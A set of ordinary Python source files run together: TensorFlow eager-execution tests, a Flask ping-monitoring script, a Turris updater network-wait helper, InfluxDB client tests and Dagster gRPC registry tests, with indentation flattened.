@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.context().executor.wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.context().executor.wait()
context.context().executor.clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
with ops.device('CPU:0'):
test_var = variables.Variable([2., 3.])
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
self.assertAllEqual(test_fn(test_var), 1.0)
def testPyFunctionAsync(self):
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
@test_util.run_gpu_only
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tfe.TFE_Py_RegisterExceptionClass(str)
pywrap_tfe.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
# TODO(b/149995282): When an exception is thrown in ASYNC mode, it seems
# there are things left over that cause mutex corruption when
# _reset_context() is called before the next test is executed.
#
# context.set_execution_mode(context.ASYNC)
# with self.assertRaises(errors.InvalidArgumentError):
# execute(
# b'MatMul',
# num_outputs=1,
# inputs=[three, five],
# attrs=('transpose_a', False, 'transpose_b', False, 'T',
# three.dtype.as_datatype_enum))
# context.context().executor.wait()
#
context.context().executor.clear_error()
context.context().execution_mode = context.SYNC
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaisesRegex(
errors.InvalidArgumentError,
'Expecting a Dimension for attr shape, got object'):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [object()], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEqual(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEqual(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
def testEmptyResourceReturned(self):
with ops.device('CPU:0'):
v = variables.Variable(1.)
empty_handle = array_ops.gather(
v.handle[array_ops.newaxis], array_ops.zeros([0], dtype=dtypes.int32))
self.assertEqual(
[0],
empty_handle.shape.as_list())
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = array_ops.identity(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
run.py
|
import os
import time
import logging
import threading
from functools import wraps
import sqlalchemy as sa
import ping
from db import init_db
from app import create_app
DB_URL = os.environ.get("DB_URL")
ENVIRONMENT = os.environ.get("FLASK_ENV", "development")
PING_HOSTS = os.environ.get("PING_HOSTS", "google.com")
PING_DELAY_SEC = int(os.environ.get("PING_DELAY_SEC", 60))
PING_FAIL_DELAY_SEC = PING_DELAY_SEC // 10 or 1
DEBUG = ENVIRONMENT == "development"
logging.basicConfig(
level=logging.DEBUG if DEBUG else logging.INFO,
format="%(asctime)s [%(levelname)-8s] %(lineno)-4s <%(funcName)s> - %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
logger = logging.getLogger(__name__)
logger.info("Starting ping %s in %s environment", PING_HOSTS, ENVIRONMENT)
logger.debug(
"PING_DELAY_SEC=%r, PING_FAIL_DELAY_SEC=%r", PING_DELAY_SEC, PING_FAIL_DELAY_SEC
)
assert DB_URL, "No DB_URL..."
assert PING_HOSTS, "Empty host..."
engine = sa.create_engine(DB_URL)
db = init_db(engine)
def run_as_thread(fn):
"""Run function as thread"""
@wraps(fn)
def run(*args, **kwargs):
t = threading.Thread(target=fn, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
return run
def log_res(res):
"""Save ping res to db
Args:
res (ping.PingResult): Ping result instance
"""
with db.session():
db.Ping.create(res.host, res.time_ms, int(time.time()))
@run_as_thread
def ping_tester(host, delay=60, delay_fail=6):
"""Ping testing thread
Args:
host (str): Ping hostname or IP
delay (int, optional): Delay between ping requests
delay_fail (int, optional): Delay between ping requests when prev ping fails
"""
while True:
res = ping.ping(host)
if not res.ok:
logger.warning("Ping failed: %s", res)
sub_res = ping.ping(host) # Double check ping if it fails
while not sub_res.ok:
log_res(sub_res)
sub_res = ping.ping(host)
time.sleep(delay_fail)
log_res(sub_res)
else:
log_res(res)
time.sleep(delay)
if __name__ == "__main__":
for host in {h for h in PING_HOSTS.split(",")}:
logger.info("Run ping tester for %s", host)
ping_tester(host, delay=PING_DELAY_SEC, delay_fail=PING_FAIL_DELAY_SEC)
app = create_app()
app.run(host="0.0.0.0")
|
prerun.py
|
"""These are functions we use before we even take pid lock file.
They allow updater-supervisor to be suspended for random amount of time or it allows it to wait for internet connection.
"""
import time
import random
import typing
import subprocess
import multiprocessing
from . import const, utils
def random_sleep(min_seconds: int, max_seconds: int):
"""Sleep random amount of seconds with given range (min and max amount of seconds)."""
if max_seconds is None or max_seconds <= 0 or max_seconds < min_seconds:
return # No sleep at all
suspend = min_seconds + random.randrange(max_seconds - min_seconds)
if suspend > 0: # Just nice to have no print if we wait for 0 seconds
utils.report("Suspending updater start for " + str(suspend) + " seconds")
time.sleep(suspend)
def turris_repo_health(address: str = const.TURRIS_REPO_HEALTH_URL) -> bool:
"""Try to receive provided address and checks if result is "ok".
Returns True on success and False if download in any way fails.
"""
res = subprocess.run(['curl', address], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, text=True, check=False)
return res.returncode == 0 and res.stdout == "ok\n"
def wait_for_network(max_stall: int) -> bool:
"""Wait for ability to access the repo.turris.cz.
The max_stall can be any number of seconds but too small numbers (few seconds) should not be used as it might not be
enough time to actually perform even a single network connection test. For zero and negative numbers this function
behaves the same way as call to the turris_repo_health.
Returns True if connection is successful and False if wait timed out.
"""
def network_test():
"""Run network test (expected to be run as subprocess)."""
if not turris_repo_health():
utils.report("Waiting for network connection")
delay = 2
while True:
now = time.time()
if turris_repo_health():
return
sleep_time = delay - time.time() - now
if sleep_time > 0:
time.sleep(sleep_time)
delay *= 2
if max_stall <= 0:
return turris_repo_health()
process = multiprocessing.Process(target=network_test)
process.start()
process.join(max_stall)
if process.is_alive():
process.terminate()
return False
return True
|
test_InfluxDBClient.py
|
import http.server
import json
import os
import threading
import unittest
from influxdb_client import InfluxDBClient, Point
from influxdb_client.client.write_api import SYNCHRONOUS, ASYNCHRONOUS, WriteOptions, WriteType
class InfluxDBClientTest(unittest.TestCase):
def tearDown(self) -> None:
if self.client:
self.client.close()
if hasattr(self, 'httpd'):
self.httpd.shutdown()
if hasattr(self, 'httpd_thread'):
self.httpd_thread.join()
def test_default_conf(self):
self.client = InfluxDBClient(url="http://localhost:8086", token="my-token", org="my-org")
self.assertIsNotNone(self.client.api_client.configuration.connection_pool_maxsize)
def test_TrailingSlashInUrl(self):
self.client = InfluxDBClient(url="http://localhost:8086", token="my-token", org="my-org")
self.assertEqual('http://localhost:8086', self.client.api_client.configuration.host)
self.client = InfluxDBClient(url="http://localhost:8086/", token="my-token", org="my-org")
self.assertEqual('http://localhost:8086', self.client.api_client.configuration.host)
def test_ConnectToSelfSignedServer(self):
self._start_http_server()
self.client = InfluxDBClient(f"https://localhost:{self.httpd.server_address[1]}",
token="my-token", verify_ssl=False)
health = self.client.health()
self.assertEqual(health.message, 'ready for queries and writes')
self.assertEqual(health.status, "pass")
self.assertEqual(health.name, "influxdb")
def test_certificate_file(self):
self._start_http_server()
self.client = InfluxDBClient(f"https://localhost:{self.httpd.server_address[1]}",
token="my-token", verify_ssl=True,
ssl_ca_cert=f'{os.path.dirname(__file__)}/server.pem')
health = self.client.health()
self.assertEqual(health.message, 'ready for queries and writes')
self.assertEqual(health.status, "pass")
self.assertEqual(health.name, "influxdb")
def test_init_from_ini_file(self):
self.client = InfluxDBClient.from_config_file(f'{os.path.dirname(__file__)}/config.ini')
self.assertConfig()
def test_init_from_toml_file(self):
self.client = InfluxDBClient.from_config_file(f'{os.path.dirname(__file__)}/config.toml')
self.assertConfig()
def assertConfig(self):
self.assertEqual("http://localhost:8086", self.client.url)
self.assertEqual("my-org", self.client.org)
self.assertEqual("my-token", self.client.token)
self.assertEqual(6000, self.client.api_client.configuration.timeout)
self.assertEqual(3, len(self.client.default_tags))
self.assertEqual("132-987-655", self.client.default_tags["id"])
self.assertEqual("California Miner", self.client.default_tags["customer"])
self.assertEqual("${env.data_center}", self.client.default_tags["data_center"])
self.assertEqual(55, self.client.api_client.configuration.connection_pool_maxsize)
self.assertEqual(False, self.client.api_client.configuration.auth_basic)
def test_init_from_file_ssl_default(self):
self.client = InfluxDBClient.from_config_file(f'{os.path.dirname(__file__)}/config.ini')
self.assertTrue(self.client.api_client.configuration.verify_ssl)
def test_init_from_file_ssl(self):
self.client = InfluxDBClient.from_config_file(f'{os.path.dirname(__file__)}/config-disabled-ssl.ini')
self.assertFalse(self.client.api_client.configuration.verify_ssl)
def test_init_from_env_ssl_default(self):
if os.getenv("INFLUXDB_V2_VERIFY_SSL"):
del os.environ["INFLUXDB_V2_VERIFY_SSL"]
self.client = InfluxDBClient.from_env_properties()
self.assertTrue(self.client.api_client.configuration.verify_ssl)
def test_init_from_env_ssl(self):
os.environ["INFLUXDB_V2_SSL_CA_CERT"] = "/my/custom/path"
self.client = InfluxDBClient.from_env_properties()
self.assertEqual("/my/custom/path", self.client.api_client.configuration.ssl_ca_cert)
def test_init_from_file_ssl_ca_cert_default(self):
self.client = InfluxDBClient.from_config_file(f'{os.path.dirname(__file__)}/config.ini')
self.assertIsNone(self.client.api_client.configuration.ssl_ca_cert)
def test_init_from_file_ssl_ca_cert(self):
self.client = InfluxDBClient.from_config_file(f'{os.path.dirname(__file__)}/config-ssl-ca-cert.ini')
self.assertEqual("/path/to/my/cert", self.client.api_client.configuration.ssl_ca_cert)
def test_init_from_env_ssl_ca_cert_default(self):
if os.getenv("INFLUXDB_V2_SSL_CA_CERT"):
del os.environ["INFLUXDB_V2_SSL_CA_CERT"]
self.client = InfluxDBClient.from_env_properties()
self.assertIsNone(self.client.api_client.configuration.ssl_ca_cert)
def test_init_from_env_ssl_ca_cert(self):
os.environ["INFLUXDB_V2_SSL_CA_CERT"] = "/my/custom/path/to/cert"
self.client = InfluxDBClient.from_env_properties()
self.assertEqual("/my/custom/path/to/cert", self.client.api_client.configuration.ssl_ca_cert)
def test_init_from_env_connection_pool_maxsize(self):
os.environ["INFLUXDB_V2_CONNECTION_POOL_MAXSIZE"] = "29"
self.client = InfluxDBClient.from_env_properties()
self.assertEqual(29, self.client.api_client.configuration.connection_pool_maxsize)
def _start_http_server(self):
import http.server
import ssl
# Disable unverified HTTPS requests
import urllib3
urllib3.disable_warnings()
# Configure HTTP server
self.httpd = http.server.HTTPServer(('localhost', 0), ServerWithSelfSingedSSL)
self.httpd.socket = ssl.wrap_socket(self.httpd.socket, certfile=f'{os.path.dirname(__file__)}/server.pem',
server_side=True)
# Start server at background
self.httpd_thread = threading.Thread(target=self.httpd.serve_forever)
self.httpd_thread.start()
def test_write_context_manager(self):
with InfluxDBClient.from_env_properties(self.debug) as self.client:
api_client = self.client.api_client
with self.client.write_api(write_options=WriteOptions(write_type=WriteType.batching)) as write_api:
write_api_test = write_api
write_api.write(bucket="my-bucket",
record=Point("h2o_feet")
.tag("location", "coyote_creek")
.field("level water_level", 5.0))
self.assertIsNotNone(write_api._subject)
self.assertIsNotNone(write_api._disposable)
self.assertIsNone(write_api_test._subject)
self.assertIsNone(write_api_test._disposable)
self.assertIsNotNone(self.client.api_client)
self.assertIsNotNone(self.client.api_client.rest_client.pool_manager)
self.assertIsNone(api_client._pool)
self.assertIsNone(self.client.api_client)
class ServerWithSelfSingedSSL(http.server.SimpleHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
def do_GET(self):
self._set_headers()
response = json.dumps(
dict(name="influxdb", message="ready for queries and writes", status="pass", checks=[], version="2.0.0",
commit="abcdefgh")).encode('utf-8')
self.wfile.write(response)
|
test_grpc_server_registry.py
|
import sys
import threading
import time
from dagster import file_relative_path, pipeline, repository
from dagster.core.host_representation.grpc_server_registry import ProcessGrpcServerRegistry
from dagster.core.host_representation.handle import GrpcServerRepositoryLocationHandle
from dagster.core.host_representation.handle_manager import RepositoryLocationHandleManager
from dagster.core.host_representation.origin import ManagedGrpcPythonEnvRepositoryLocationOrigin
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
@pipeline
def noop_pipeline():
pass
@repository
def repo():
return [noop_pipeline]
def _can_connect(origin, endpoint):
try:
with GrpcServerRepositoryLocationHandle(
origin=origin,
server_id=endpoint.server_id,
port=endpoint.port,
socket=endpoint.socket,
host=endpoint.host,
watch_server=False,
):
return True
except Exception: # pylint: disable=broad-except
return False
def test_process_server_registry():
origin = ManagedGrpcPythonEnvRepositoryLocationOrigin(
loadable_target_origin=LoadableTargetOrigin(
executable_path=sys.executable,
attribute="repo",
python_file=file_relative_path(__file__, "test_grpc_server_registry.py"),
),
)
with ProcessGrpcServerRegistry(
wait_for_processes_on_exit=True, cleanup_interval=5, heartbeat_interval=10
) as registry:
with RepositoryLocationHandleManager(registry) as handle_manager:
endpoint_one = registry.get_grpc_endpoint(origin)
handle_one = handle_manager.get_handle(origin)
endpoint_two = registry.get_grpc_endpoint(origin)
handle_two = handle_manager.get_handle(origin)
assert endpoint_two == endpoint_one
assert handle_two == handle_one
assert _can_connect(origin, endpoint_one)
assert _can_connect(origin, endpoint_two)
start_time = time.time()
while True:
# Registry should return a new server endpoint after 5 seconds
endpoint_three = registry.get_grpc_endpoint(origin)
if endpoint_three.server_id != endpoint_one.server_id:
# Handle manager now produces a new handle as well
handle_three = handle_manager.get_handle(origin)
assert handle_three != handle_one
break
if time.time() - start_time > 15:
raise Exception("Server ID never changed")
time.sleep(1)
assert _can_connect(origin, endpoint_three)
# Leave handle_manager context, all heartbeats stop
start_time = time.time()
while True:
# Server at endpoint_one should eventually die due to heartbeat failure
if not _can_connect(origin, endpoint_one):
break
if time.time() - start_time > 30:
raise Exception("Old Server never died after process manager released it")
time.sleep(1)
# Make one more fresh process, then leave the context so that it will be cleaned up
while True:
endpoint_four = registry.get_grpc_endpoint(origin)
if endpoint_four.server_id != endpoint_three.server_id:
assert _can_connect(origin, endpoint_four)
break
# Once we leave the ProcessGrpcServerRegistry context, all processes should be cleaned up
# (if wait_for_processes_on_exit was set)
assert not _can_connect(origin, endpoint_three)
assert not _can_connect(origin, endpoint_four)
def _registry_thread(origin, registry, endpoint, event):
if registry.get_grpc_endpoint(origin) == endpoint:
event.set()
def test_registry_multithreading():
origin = ManagedGrpcPythonEnvRepositoryLocationOrigin(
loadable_target_origin=LoadableTargetOrigin(
executable_path=sys.executable,
attribute="repo",
python_file=file_relative_path(__file__, "test_grpc_server_registry.py"),
),
)
with ProcessGrpcServerRegistry(
wait_for_processes_on_exit=True, cleanup_interval=300, heartbeat_interval=600
) as registry:
endpoint = registry.get_grpc_endpoint(origin)
threads = []
success_events = []
for _index in range(5):
event = threading.Event()
thread = threading.Thread(
target=_registry_thread, args=(origin, registry, endpoint, event)
)
threads.append(thread)
success_events.append(event)
thread.start()
